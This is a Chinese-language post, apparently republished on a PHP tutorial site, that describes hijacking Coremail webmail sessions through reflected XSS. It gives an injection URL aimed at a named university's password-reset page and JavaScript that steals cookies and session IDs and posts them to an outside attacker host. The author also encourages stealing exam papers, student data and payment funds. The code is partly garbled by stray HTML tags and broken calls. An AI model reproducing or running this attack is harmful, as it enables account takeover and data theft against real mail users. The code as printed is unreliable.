写代码我真的是小菜鸟 估计很多地方语法错误,大家将就着看吧..
浏览器 的bypass我就不说了 我的方法在IE8下无法实现的. 1、首先在 http://mail.bnu.edu.cn/coremail/forgetpwd1. jsp ? uid=%22%3E%3Cscript%20src=http://files.cnblogs.com/xsser/coremail.js%3E%3C/script%3E 注入自己的代码。
2、比如
因为在coremail里 验证是靠sid来进行的。但是sid是写在链接里的 当然cookie里也有个叫coremail.sid。。。。呵呵呵 其实coremail作为各大高校常用的mail 系统 。其csrf也是比较都的,搞定mail就可以搞定试卷…全校数据信息…各种*&……#@! 你懂的!要是能刷个支付宝啥的 钱虽然比较少,但是全部搞起来的话也够你大学4年白吃白喝了,不过这个是非法的事情,注意刑法的修改条例了。 然后加载的js为: var my_post = ""; var b,c,d,mail_cookies; var xhr; document.write("<iframe height="0" id="hacker" name="hacker" src="http://mail.simida.com/index.jsp" width="0">");<br> b = document.frames["hacker"].document.getElementsByName("indexFrame");<br> c = b.split(/gmain\.jsp\?sid\=/);<br> mail_cookies = document.cookie;<br> function xhr(){<br> if (window.XMLHttpRequest)<br> {<br> xhr=new XMLHttpRequest();<br> }<br> else<br> {<br> xhr=new ActiveXObject("Microsoft.XMLHTTP");<br> }<br> }<br> function callback(){<br> if (xhr.readyState == 4) {<br> if (xhr.status == 200 ) {<br> alert(/you r hacked /.source);<br> }<br> }<br> }<br> function inject(){<br> xhr();<br> xhr.open("POST","http://www.blackh4t.org/receive.php",true);<br> xhr.onreadystatechange = callback;<br> xhr.send(mail_cookies + "<br> " + c);<br> }<br> xhr();<br> inject();</iframe>
查看更多关于用xss黑掉coremail的sid - 网站安全 - 自学php的详细内容...